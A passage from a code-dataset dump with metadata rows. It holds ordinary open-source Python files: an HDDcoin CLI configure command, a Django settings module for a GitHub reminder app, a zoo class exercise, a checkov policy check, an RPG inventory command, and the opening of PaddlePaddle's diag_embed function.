print Fore.CYAN+"\n\nFINISHED\n"
| false | true |
7900f28d74575776b4d682f465ff816cbf5b004b | 8,220 | py | Python | hddcoin/cmds/configure.py | grayfallstown/hddcoin-blockchain | 39164acef655b51b83f40ff808df72fbaab9c0df | [
"Apache-2.0"
] | null | null | null | hddcoin/cmds/configure.py | grayfallstown/hddcoin-blockchain | 39164acef655b51b83f40ff808df72fbaab9c0df | [
"Apache-2.0"
] | null | null | null | hddcoin/cmds/configure.py | grayfallstown/hddcoin-blockchain | 39164acef655b51b83f40ff808df72fbaab9c0df | [
"Apache-2.0"
] | null | null | null | from pathlib import Path
from typing import Dict
import click
from hddcoin.util.config import load_config, save_config, str2bool
from hddcoin.util.default_root import DEFAULT_ROOT_PATH
def configure(
root_path: Path,
set_farmer_peer: str,
set_node_introducer: str,
set_fullnode_port: str,
set_log_level: str,
enable_upnp: str,
set_outbound_peer_count: str,
set_peer_count: str,
testnet: str,
):
config: Dict = load_config(DEFAULT_ROOT_PATH, "config.yaml")
change_made = False
if set_node_introducer:
try:
if set_node_introducer.index(":"):
host, port = (
":".join(set_node_introducer.split(":")[:-1]),
set_node_introducer.split(":")[-1],
)
config["full_node"]["introducer_peer"]["host"] = host
config["full_node"]["introducer_peer"]["port"] = int(port)
config["introducer"]["port"] = int(port)
print("Node introducer updated")
change_made = True
except ValueError:
print("Node introducer address must be in format [IP:Port]")
if set_farmer_peer:
try:
if set_farmer_peer.index(":"):
host, port = (
":".join(set_farmer_peer.split(":")[:-1]),
set_farmer_peer.split(":")[-1],
)
config["full_node"]["farmer_peer"]["host"] = host
config["full_node"]["farmer_peer"]["port"] = int(port)
config["harvester"]["farmer_peer"]["host"] = host
config["harvester"]["farmer_peer"]["port"] = int(port)
print("Farmer peer updated, make sure your harvester has the proper cert installed")
change_made = True
except ValueError:
print("Farmer address must be in format [IP:Port]")
if set_fullnode_port:
config["full_node"]["port"] = int(set_fullnode_port)
config["full_node"]["introducer_peer"]["port"] = int(set_fullnode_port)
config["farmer"]["full_node_peer"]["port"] = int(set_fullnode_port)
config["timelord"]["full_node_peer"]["port"] = int(set_fullnode_port)
config["wallet"]["full_node_peer"]["port"] = int(set_fullnode_port)
config["wallet"]["introducer_peer"]["port"] = int(set_fullnode_port)
config["introducer"]["port"] = int(set_fullnode_port)
print("Default full node port updated")
change_made = True
if set_log_level:
levels = ["CRITICAL", "ERROR", "WARNING", "INFO", "DEBUG", "NOTSET"]
if set_log_level in levels:
config["logging"]["log_level"] = set_log_level
print(f"Logging level updated. Check {DEFAULT_ROOT_PATH}/log/debug.log")
change_made = True
else:
print(f"Logging level not updated. Use one of: {levels}")
if enable_upnp is not None:
config["full_node"]["enable_upnp"] = str2bool(enable_upnp)
if str2bool(enable_upnp):
print("uPnP enabled")
else:
print("uPnP disabled")
change_made = True
if set_outbound_peer_count is not None:
config["full_node"]["target_outbound_peer_count"] = int(set_outbound_peer_count)
print("Target outbound peer count updated")
change_made = True
if set_peer_count is not None:
config["full_node"]["target_peer_count"] = int(set_peer_count)
print("Target peer count updated")
change_made = True
if testnet is not None:
if testnet == "true" or testnet == "t":
print("Setting Testnet")
testnet_port = "58444"
testnet_introducer = "beta1_introducer.hddcoin.org"
testnet = "testnet7"
config["full_node"]["port"] = int(testnet_port)
config["full_node"]["introducer_peer"]["port"] = int(testnet_port)
config["farmer"]["full_node_peer"]["port"] = int(testnet_port)
config["timelord"]["full_node_peer"]["port"] = int(testnet_port)
config["wallet"]["full_node_peer"]["port"] = int(testnet_port)
config["wallet"]["introducer_peer"]["port"] = int(testnet_port)
config["introducer"]["port"] = int(testnet_port)
config["full_node"]["introducer_peer"]["host"] = testnet_introducer
config["selected_network"] = testnet
config["harvester"]["selected_network"] = testnet
config["pool"]["selected_network"] = testnet
config["farmer"]["selected_network"] = testnet
config["timelord"]["selected_network"] = testnet
config["full_node"]["selected_network"] = testnet
config["ui"]["selected_network"] = testnet
config["introducer"]["selected_network"] = testnet
config["wallet"]["selected_network"] = testnet
print("Default full node port, introducer and network setting updated")
change_made = True
elif testnet == "false" or testnet == "f":
print("Setting Mainnet")
mainnet_port = "8444"
mainnet_introducer = "introducer.hddcoin.org"
net = "mainnet"
config["full_node"]["port"] = int(mainnet_port)
config["full_node"]["introducer_peer"]["port"] = int(mainnet_port)
config["farmer"]["full_node_peer"]["port"] = int(mainnet_port)
config["timelord"]["full_node_peer"]["port"] = int(mainnet_port)
config["wallet"]["full_node_peer"]["port"] = int(mainnet_port)
config["wallet"]["introducer_peer"]["port"] = int(mainnet_port)
config["introducer"]["port"] = int(mainnet_port)
config["full_node"]["introducer_peer"]["host"] = mainnet_introducer
config["selected_network"] = net
config["harvester"]["selected_network"] = net
config["pool"]["selected_network"] = net
config["farmer"]["selected_network"] = net
config["timelord"]["selected_network"] = net
config["full_node"]["selected_network"] = net
config["ui"]["selected_network"] = net
config["introducer"]["selected_network"] = net
config["wallet"]["selected_network"] = net
print("Default full node port, introducer and network setting updated")
change_made = True
else:
print("Please choose True or False")
if change_made:
print("Restart any running hddcoin services for changes to take effect")
save_config(root_path, "config.yaml", config)
return 0
# CLI wrapper: `hddcoin configure ...`.  Every option is optional and maps
# one-to-one onto a parameter of configure() above.  (No docstring on the
# function on purpose: click would surface it as extra help text.)
@click.command("configure", short_help="Modify configuration")
@click.option(
    "--testnet",
    "-t",
    help="configures for connection to testnet",
    type=click.Choice(["true", "t", "false", "f"]),
)
@click.option("--set-node-introducer", help="Set the introducer for node - IP:Port", type=str)
@click.option("--set-farmer-peer", help="Set the farmer peer for harvester - IP:Port", type=str)
@click.option(
    "--set-fullnode-port",
    help="Set the port to use for the fullnode, useful for testing",
    type=str,
)
@click.option(
    "--set-log-level",
    "--log-level",
    "-log-level",
    help="Set the instance log level",
    type=click.Choice(["CRITICAL", "ERROR", "WARNING", "INFO", "DEBUG", "NOTSET"]),
)
@click.option(
    "--enable-upnp",
    "--upnp",
    "-upnp",
    help="Enable or disable uPnP",
    type=click.Choice(["true", "t", "false", "f"]),
)
# NOTE(review): this flag mixes an underscore into its name, unlike every
# other dashed option; renaming it would break existing scripts, so it is
# only flagged here.
@click.option(
    "--set_outbound-peer-count",
    help="Update the target outbound peer count (default 8)",
    type=str,
)
@click.option("--set-peer-count", help="Update the target peer count (default 80)", type=str)
@click.pass_context
def configure_cmd(
    ctx,
    set_farmer_peer,
    set_node_introducer,
    set_fullnode_port,
    set_log_level,
    enable_upnp,
    set_outbound_peer_count,
    set_peer_count,
    testnet,
):
    # ctx.obj["root_path"] is populated by the parent command group.
    configure(
        ctx.obj["root_path"],
        set_farmer_peer,
        set_node_introducer,
        set_fullnode_port,
        set_log_level,
        enable_upnp,
        set_outbound_peer_count,
        set_peer_count,
        testnet,
    )
| 40.895522 | 100 | 0.60292 | from pathlib import Path
from typing import Dict
import click
from hddcoin.util.config import load_config, save_config, str2bool
from hddcoin.util.default_root import DEFAULT_ROOT_PATH
def configure(
root_path: Path,
set_farmer_peer: str,
set_node_introducer: str,
set_fullnode_port: str,
set_log_level: str,
enable_upnp: str,
set_outbound_peer_count: str,
set_peer_count: str,
testnet: str,
):
config: Dict = load_config(DEFAULT_ROOT_PATH, "config.yaml")
change_made = False
if set_node_introducer:
try:
if set_node_introducer.index(":"):
host, port = (
":".join(set_node_introducer.split(":")[:-1]),
set_node_introducer.split(":")[-1],
)
config["full_node"]["introducer_peer"]["host"] = host
config["full_node"]["introducer_peer"]["port"] = int(port)
config["introducer"]["port"] = int(port)
print("Node introducer updated")
change_made = True
except ValueError:
print("Node introducer address must be in format [IP:Port]")
if set_farmer_peer:
try:
if set_farmer_peer.index(":"):
host, port = (
":".join(set_farmer_peer.split(":")[:-1]),
set_farmer_peer.split(":")[-1],
)
config["full_node"]["farmer_peer"]["host"] = host
config["full_node"]["farmer_peer"]["port"] = int(port)
config["harvester"]["farmer_peer"]["host"] = host
config["harvester"]["farmer_peer"]["port"] = int(port)
print("Farmer peer updated, make sure your harvester has the proper cert installed")
change_made = True
except ValueError:
print("Farmer address must be in format [IP:Port]")
if set_fullnode_port:
config["full_node"]["port"] = int(set_fullnode_port)
config["full_node"]["introducer_peer"]["port"] = int(set_fullnode_port)
config["farmer"]["full_node_peer"]["port"] = int(set_fullnode_port)
config["timelord"]["full_node_peer"]["port"] = int(set_fullnode_port)
config["wallet"]["full_node_peer"]["port"] = int(set_fullnode_port)
config["wallet"]["introducer_peer"]["port"] = int(set_fullnode_port)
config["introducer"]["port"] = int(set_fullnode_port)
print("Default full node port updated")
change_made = True
if set_log_level:
levels = ["CRITICAL", "ERROR", "WARNING", "INFO", "DEBUG", "NOTSET"]
if set_log_level in levels:
config["logging"]["log_level"] = set_log_level
print(f"Logging level updated. Check {DEFAULT_ROOT_PATH}/log/debug.log")
change_made = True
else:
print(f"Logging level not updated. Use one of: {levels}")
if enable_upnp is not None:
config["full_node"]["enable_upnp"] = str2bool(enable_upnp)
if str2bool(enable_upnp):
print("uPnP enabled")
else:
print("uPnP disabled")
change_made = True
if set_outbound_peer_count is not None:
config["full_node"]["target_outbound_peer_count"] = int(set_outbound_peer_count)
print("Target outbound peer count updated")
change_made = True
if set_peer_count is not None:
config["full_node"]["target_peer_count"] = int(set_peer_count)
print("Target peer count updated")
change_made = True
if testnet is not None:
if testnet == "true" or testnet == "t":
print("Setting Testnet")
testnet_port = "58444"
testnet_introducer = "beta1_introducer.hddcoin.org"
testnet = "testnet7"
config["full_node"]["port"] = int(testnet_port)
config["full_node"]["introducer_peer"]["port"] = int(testnet_port)
config["farmer"]["full_node_peer"]["port"] = int(testnet_port)
config["timelord"]["full_node_peer"]["port"] = int(testnet_port)
config["wallet"]["full_node_peer"]["port"] = int(testnet_port)
config["wallet"]["introducer_peer"]["port"] = int(testnet_port)
config["introducer"]["port"] = int(testnet_port)
config["full_node"]["introducer_peer"]["host"] = testnet_introducer
config["selected_network"] = testnet
config["harvester"]["selected_network"] = testnet
config["pool"]["selected_network"] = testnet
config["farmer"]["selected_network"] = testnet
config["timelord"]["selected_network"] = testnet
config["full_node"]["selected_network"] = testnet
config["ui"]["selected_network"] = testnet
config["introducer"]["selected_network"] = testnet
config["wallet"]["selected_network"] = testnet
print("Default full node port, introducer and network setting updated")
change_made = True
elif testnet == "false" or testnet == "f":
print("Setting Mainnet")
mainnet_port = "8444"
mainnet_introducer = "introducer.hddcoin.org"
net = "mainnet"
config["full_node"]["port"] = int(mainnet_port)
config["full_node"]["introducer_peer"]["port"] = int(mainnet_port)
config["farmer"]["full_node_peer"]["port"] = int(mainnet_port)
config["timelord"]["full_node_peer"]["port"] = int(mainnet_port)
config["wallet"]["full_node_peer"]["port"] = int(mainnet_port)
config["wallet"]["introducer_peer"]["port"] = int(mainnet_port)
config["introducer"]["port"] = int(mainnet_port)
config["full_node"]["introducer_peer"]["host"] = mainnet_introducer
config["selected_network"] = net
config["harvester"]["selected_network"] = net
config["pool"]["selected_network"] = net
config["farmer"]["selected_network"] = net
config["timelord"]["selected_network"] = net
config["full_node"]["selected_network"] = net
config["ui"]["selected_network"] = net
config["introducer"]["selected_network"] = net
config["wallet"]["selected_network"] = net
print("Default full node port, introducer and network setting updated")
change_made = True
else:
print("Please choose True or False")
if change_made:
print("Restart any running hddcoin services for changes to take effect")
save_config(root_path, "config.yaml", config)
return 0
@click.command("configure", short_help="Modify configuration")
@click.option(
"--testnet",
"-t",
help="configures for connection to testnet",
type=click.Choice(["true", "t", "false", "f"]),
)
@click.option("--set-node-introducer", help="Set the introducer for node - IP:Port", type=str)
@click.option("--set-farmer-peer", help="Set the farmer peer for harvester - IP:Port", type=str)
@click.option(
"--set-fullnode-port",
help="Set the port to use for the fullnode, useful for testing",
type=str,
)
@click.option(
"--set-log-level",
"--log-level",
"-log-level",
help="Set the instance log level",
type=click.Choice(["CRITICAL", "ERROR", "WARNING", "INFO", "DEBUG", "NOTSET"]),
)
@click.option(
"--enable-upnp",
"--upnp",
"-upnp",
help="Enable or disable uPnP",
type=click.Choice(["true", "t", "false", "f"]),
)
@click.option(
"--set_outbound-peer-count",
help="Update the target outbound peer count (default 8)",
type=str,
)
@click.option("--set-peer-count", help="Update the target peer count (default 80)", type=str)
@click.pass_context
def configure_cmd(
ctx,
set_farmer_peer,
set_node_introducer,
set_fullnode_port,
set_log_level,
enable_upnp,
set_outbound_peer_count,
set_peer_count,
testnet,
):
configure(
ctx.obj["root_path"],
set_farmer_peer,
set_node_introducer,
set_fullnode_port,
set_log_level,
enable_upnp,
set_outbound_peer_count,
set_peer_count,
testnet,
)
| true | true |
7900f2f79f90808944e1a49645ea3d9271b5adc9 | 4,055 | py | Python | hiren/settings.py | pyprism/Hiren-Git-Commit-Reminder | 253ba078f63cc9bf3f39a5b735a783c4846b5ba7 | [
"MIT"
] | null | null | null | hiren/settings.py | pyprism/Hiren-Git-Commit-Reminder | 253ba078f63cc9bf3f39a5b735a783c4846b5ba7 | [
"MIT"
] | null | null | null | hiren/settings.py | pyprism/Hiren-Git-Commit-Reminder | 253ba078f63cc9bf3f39a5b735a783c4846b5ba7 | [
"MIT"
] | null | null | null | """
Django settings for hiren project.
Generated by 'django-admin startproject' using Django 1.8.4.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
import json
from celery.schedules import crontab
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))  # two levels up from this file: the project root
# Load deployment secrets/settings from config.json, falling back to the
# checked-in sample file so a fresh clone still boots.  If neither file
# exists, the FileNotFoundError from the fallback propagates.
# Bug fix: open() without an explicit encoding uses the locale's default
# (e.g. cp1252 on Windows); JSON files are UTF-8, so say so.
try:
    with open('config.json', encoding='utf-8') as f:
        JSON_DATA = json.load(f)
except FileNotFoundError:
    with open('config.sample.json', encoding='utf-8') as f:
        JSON_DATA = json.load(f)
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# The environment variable wins; otherwise fall back to the value shipped in
# config.json / config.sample.json (loaded into JSON_DATA above).
SECRET_KEY = os.environ.get('SECRET_KEY', JSON_DATA['secret_key'])
# SECURITY WARNING: don't run with debug turned on in production!
# Bug fix: os.environ values are strings, so the old
# `os.environ.get('DEBUG', False)` was truthy for ANY non-empty value --
# even DEBUG=False or DEBUG=0 in the environment.  Parse it explicitly;
# unset still means False.
DEBUG = os.environ.get('DEBUG', 'False').strip().lower() in ('1', 'true', 'yes', 'on')
ALLOWED_HOSTS = ['*']  # NOTE(review): wildcard hosts -- acceptable only behind a trusted proxy
# Application definition
INSTALLED_APPS = (
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'debug_toolbar',  # NOTE(review): enabled unconditionally, not gated on DEBUG
    'github'  # the project's single first-party app
)
MIDDLEWARE_CLASSES = (
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
    'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'hiren.urls'
# One filesystem template dir ("templates/" at the project root, relative to
# the working directory) plus per-app template directories.
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': ['templates'],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'hiren.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
# Travis CI ships a passwordless "postgres" superuser; local development uses
# the dedicated "hiren" database/role.  Everything else is identical, so the
# two configurations are expressed as per-key conditionals instead of two
# duplicated dicts.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.postgresql_psycopg2',
        'NAME': 'travisci' if 'TRAVIS' in os.environ else 'hiren_github_management',
        'USER': 'postgres' if 'TRAVIS' in os.environ else 'hiren',
        'PASSWORD': '' if 'TRAVIS' in os.environ else 'hiren',
        'HOST': 'localhost',
        'PORT': '',
    }
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Dhaka'
USE_I18N = True
USE_L10N = True
USE_TZ = True  # store datetimes as UTC; render in TIME_ZONE
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_FINDERS = (
    "django.contrib.staticfiles.finders.FileSystemFinder",
    "django.contrib.staticfiles.finders.AppDirectoriesFinder"
)
# project-level assets live in <repo>/static alongside per-app static dirs
STATICFILES_DIRS = (
    os.path.join(BASE_DIR, "static"),
)
LOGIN_URL = '/'  # unauthenticated users are redirected to the index page
# CELERY STUFF
# Redis doubles as both the message broker and the result backend; all
# payloads travel as JSON.
BROKER_URL = 'redis://localhost:6379'
CELERY_RESULT_BACKEND = 'redis://localhost:6379'
CELERY_ACCEPT_CONTENT = ['application/json']
CELERY_TASK_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'
CELERYBEAT_SCHEDULE = {
    # Consistency fix: the entry was labelled 'add-every-30-seconds', which
    # contradicts the crontab below (once a day at 22:00).  The key is only a
    # beat-schedule label, so renaming it does not affect the task itself.
    'fetch-github-data-daily': {
        'task': 'github.tasks.get_data',
        'schedule': crontab(minute=0, hour='22'),  # execute every day at 10 pm
    },
}
import os
import json
from celery.schedules import crontab
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
try:
with open('config.json') as f:
JSON_DATA = json.load(f)
except FileNotFoundError:
with open('config.sample.json') as f:
JSON_DATA = json.load(f)
SECRET_KEY = os.environ.get('SECRET_KEY', JSON_DATA['secret_key'])
DEBUG = os.environ.get('DEBUG', False)
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'debug_toolbar',
'github'
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'hiren.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'hiren.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
if 'TRAVIS' in os.environ:
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'travisci',
'USER': 'postgres',
'PASSWORD': '',
'HOST': 'localhost',
'PORT': '',
}
}
else:
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'hiren_github_management',
'USER': 'hiren',
'PASSWORD': 'hiren',
'HOST': 'localhost',
'PORT': '',
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Dhaka'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_FINDERS = (
"django.contrib.staticfiles.finders.FileSystemFinder",
"django.contrib.staticfiles.finders.AppDirectoriesFinder"
)
STATICFILES_DIRS = (
os.path.join(BASE_DIR, "static"),
)
LOGIN_URL = '/'
# CELERY STUFF
BROKER_URL = 'redis://localhost:6379'
CELERY_RESULT_BACKEND = 'redis://localhost:6379'
CELERY_ACCEPT_CONTENT = ['application/json']
CELERY_TASK_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'
CELERYBEAT_SCHEDULE = {
'add-every-30-seconds': {
'task': 'github.tasks.get_data',
'schedule': crontab(minute=0, hour='22'), # execute every day at 10 pm
},
} | true | true |
7900f558ba3cb2a22f1e91d6aea1398154ad6999 | 227 | py | Python | encapsulation_exercise/wild_cat_zoo/project/cheetah.py | Veselin-Stoilov/software-university-OOP | 452a77cabf2e7d93f30f629c67c6b22682eb255d | [
"MIT"
] | null | null | null | encapsulation_exercise/wild_cat_zoo/project/cheetah.py | Veselin-Stoilov/software-university-OOP | 452a77cabf2e7d93f30f629c67c6b22682eb255d | [
"MIT"
] | null | null | null | encapsulation_exercise/wild_cat_zoo/project/cheetah.py | Veselin-Stoilov/software-university-OOP | 452a77cabf2e7d93f30f629c67c6b22682eb255d | [
"MIT"
] | null | null | null | from encapsulation_exercise.wild_cat_zoo.project.animal import Animal
class Cheetah(Animal):
MONEY_FOR_CARE = 60
def __init__(self, name, gender, age):
super().__init__(name, gender, age, self.MONEY_FOR_CARE) | 28.375 | 69 | 0.744493 | from encapsulation_exercise.wild_cat_zoo.project.animal import Animal
class Cheetah(Animal):
MONEY_FOR_CARE = 60
def __init__(self, name, gender, age):
super().__init__(name, gender, age, self.MONEY_FOR_CARE) | true | true |
7900f75862ab17d020e9f97590f0c8a2e4e2eda3 | 690 | py | Python | checkov/terraform/checks/resource/alicloud/PasswordPolicyLowercaseLetter.py | pmalkki/checkov | b6cdf386dd976fe27c16fed6d550756a678a5d7b | [
"Apache-2.0"
] | null | null | null | checkov/terraform/checks/resource/alicloud/PasswordPolicyLowercaseLetter.py | pmalkki/checkov | b6cdf386dd976fe27c16fed6d550756a678a5d7b | [
"Apache-2.0"
] | null | null | null | checkov/terraform/checks/resource/alicloud/PasswordPolicyLowercaseLetter.py | pmalkki/checkov | b6cdf386dd976fe27c16fed6d550756a678a5d7b | [
"Apache-2.0"
] | null | null | null | from checkov.common.models.enums import CheckCategories
from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck
class PasswordPolicyLowercaseLetter(BaseResourceValueCheck):
def __init__(self):
name = "Ensure RAM password policy requires at least one lowercase letter"
id = "CKV_ALI_17"
supported_resources = ['alicloud_ram_account_password_policy']
categories = [CheckCategories.IAM]
super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
def get_inspected_key(self):
return 'require_lowercase_characters'
check = PasswordPolicyLowercaseLetter()
| 38.333333 | 106 | 0.778261 | from checkov.common.models.enums import CheckCategories
from checkov.terraform.checks.resource.base_resource_value_check import BaseResourceValueCheck
class PasswordPolicyLowercaseLetter(BaseResourceValueCheck):
def __init__(self):
name = "Ensure RAM password policy requires at least one lowercase letter"
id = "CKV_ALI_17"
supported_resources = ['alicloud_ram_account_password_policy']
categories = [CheckCategories.IAM]
super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
def get_inspected_key(self):
return 'require_lowercase_characters'
check = PasswordPolicyLowercaseLetter()
| true | true |
7900f7c8aad75edcf055538b87ce505314e70cce | 952 | py | Python | tarakania_rpg/commands/rpg/inventory/inventory.py | tarakania/discord-bot | 801d7004589800c6013f32a3289f4b8277b289b2 | [
"MIT"
] | 1 | 2021-06-04T16:50:42.000Z | 2021-06-04T16:50:42.000Z | tarakania_rpg/commands/rpg/inventory/inventory.py | tarakania/discord-bot | 801d7004589800c6013f32a3289f4b8277b289b2 | [
"MIT"
] | 3 | 2021-06-02T00:22:51.000Z | 2021-06-03T15:20:25.000Z | tarakania_rpg/commands/rpg/inventory/inventory.py | tarakania/discord-bot | 801d7004589800c6013f32a3289f4b8277b289b2 | [
"MIT"
] | 2 | 2019-08-22T07:30:12.000Z | 2021-06-04T16:49:42.000Z | from typing import Dict
from handler import Context, Arguments, CommandResult
from rpg.items import Item
from utils.formatting import codeblock
from utils.command_helpers import get_author_player
async def run(ctx: Context, args: Arguments) -> CommandResult:
player = await get_author_player(ctx)
if player.inventory.size:
counts: Dict[Item, int] = {}
for item in player.inventory:
counts[item] = counts.get(item, 0) + 1
inventory = "\n".join(
f"{item}{' x ' + str(count) if count > 1 else ''}"
for item, count in counts.items()
)
else:
inventory = "Ваш инвентарь пуст"
equipment_item_map = [
(slot, getattr(player.equipment, slot)) for slot in player.equipment._slots
]
equipment = "\n".join(f"{slot:>10}: {item}" for (slot, item) in equipment_item_map)
return codeblock(f"Экипировка:\n\n{equipment}\n\nИнвентарь:\n\n{inventory}")
| 30.709677 | 87 | 0.652311 | from typing import Dict
from handler import Context, Arguments, CommandResult
from rpg.items import Item
from utils.formatting import codeblock
from utils.command_helpers import get_author_player
async def run(ctx: Context, args: Arguments) -> CommandResult:
player = await get_author_player(ctx)
if player.inventory.size:
counts: Dict[Item, int] = {}
for item in player.inventory:
counts[item] = counts.get(item, 0) + 1
inventory = "\n".join(
f"{item}{' x ' + str(count) if count > 1 else ''}"
for item, count in counts.items()
)
else:
inventory = "Ваш инвентарь пуст"
equipment_item_map = [
(slot, getattr(player.equipment, slot)) for slot in player.equipment._slots
]
equipment = "\n".join(f"{slot:>10}: {item}" for (slot, item) in equipment_item_map)
return codeblock(f"Экипировка:\n\n{equipment}\n\nИнвентарь:\n\n{inventory}")
| true | true |
7900f903e7fd2f5bc298d18b28fd602f309238e9 | 5,990 | py | Python | python/paddle/nn/functional/extension.py | wangna11BD/Paddle | bc379ca3d5895eadbc1748bc5b71606011563ee1 | [
"Apache-2.0"
] | 1 | 2021-04-28T13:47:27.000Z | 2021-04-28T13:47:27.000Z | python/paddle/nn/functional/extension.py | wangna11BD/Paddle | bc379ca3d5895eadbc1748bc5b71606011563ee1 | [
"Apache-2.0"
] | null | null | null | python/paddle/nn/functional/extension.py | wangna11BD/Paddle | bc379ca3d5895eadbc1748bc5b71606011563ee1 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# TODO: define the extention functions
import numpy as np
from ...fluid.data_feeder import check_dtype
from ...fluid.layer_helper import LayerHelper
from ...fluid.framework import Variable, in_dygraph_mode
from ...fluid.layers.tensor import assign
from ...fluid import core, dygraph_utils
from ...fluid.layers.layer_function_generator import templatedoc
from ...fluid.layers.sequence_lod import sequence_mask
def diag_embed(input, offset=0, dim1=-2, dim2=-1):
"""
This OP creates a tensor whose diagonals of certain 2D planes (specified by dim1 and dim2)
are filled by ``input``. By default, a 2D plane formed by the last two dimensions
of the returned tensor will be selected.
The argument ``offset`` determines which diagonal is generated:
- If offset = 0, it is the main diagonal.
- If offset > 0, it is above the main diagonal.
- If offset < 0, it is below the main diagonal.
Args:
input(Tensor|numpy.ndarray): The input tensor. Must be at least 1-dimensional. The input data type should be float32, float64, int32, int64.
offset(int, optional): Which diagonal to consider. Default: 0 (main diagonal).
dim1(int, optional): The first dimension with respect to which to take diagonal. Default: -2.
dim2(int, optional): The second dimension with respect to which to take diagonal. Default: -1.
Returns:
Tensor, the output data type is the same as input data type.
Examples:
.. code-block:: python
import paddle.nn.functional as F
import numpy as np
diag_embed = np.random.randn(2, 3).astype('float32')
# [[ 0.7545889 , -0.25074545, 0.5929117 ],
# [-0.6097662 , -0.01753256, 0.619769 ]]
data1 = F.diag_embed(diag_embed)
data1.numpy()
# [[[ 0.7545889 , 0. , 0. ],
# [ 0. , -0.25074545, 0. ],
# [ 0. , 0. , 0.5929117 ]],
# [[-0.6097662 , 0. , 0. ],
# [ 0. , -0.01753256, 0. ],
# [ 0. , 0. , 0.619769 ]]]
data2 = F.diag_embed(diag_embed, offset=-1, dim1=0, dim2=2)
data2.numpy()
# [[[ 0. , 0. , 0. , 0. ],
# [ 0.7545889 , 0. , 0. , 0. ],
# [ 0. , -0.25074545, 0. , 0. ],
# [ 0. , 0. , 0.5929117 , 0. ]],
#
# [[ 0. , 0. , 0. , 0. ],
# [-0.6097662 , 0. , 0. , 0. ],
# [ 0. , -0.01753256, 0. , 0. ],
# [ 0. , 0. , 0.619769 , 0. ]]]
data3 = F.diag_embed(diag_embed, offset=1, dim1=0, dim2=2)
data3.numpy()
# [[[ 0. , 0.7545889 , 0. , 0. ],
# [ 0. , -0.6097662 , 0. , 0. ]],
#
# [[ 0. , 0. , -0.25074545, 0. ],
# [ 0. , 0. , -0.01753256, 0. ]],
#
# [[ 0. , 0. , 0. , 0.5929117 ],
# [ 0. , 0. , 0. , 0.619769 ]],
#
# [[ 0. , 0. , 0. , 0. ],
# [ 0. , 0. , 0. , 0. ]]]
"""
inputs = {'Input': [input]}
attrs = {'offset': offset, 'dim1': dim1, 'dim2': dim2}
if not isinstance(input, Variable):
input = assign(input)
def __check_input(input, offset, dim1, dim2):
check_dtype(input.dtype, 'Input',
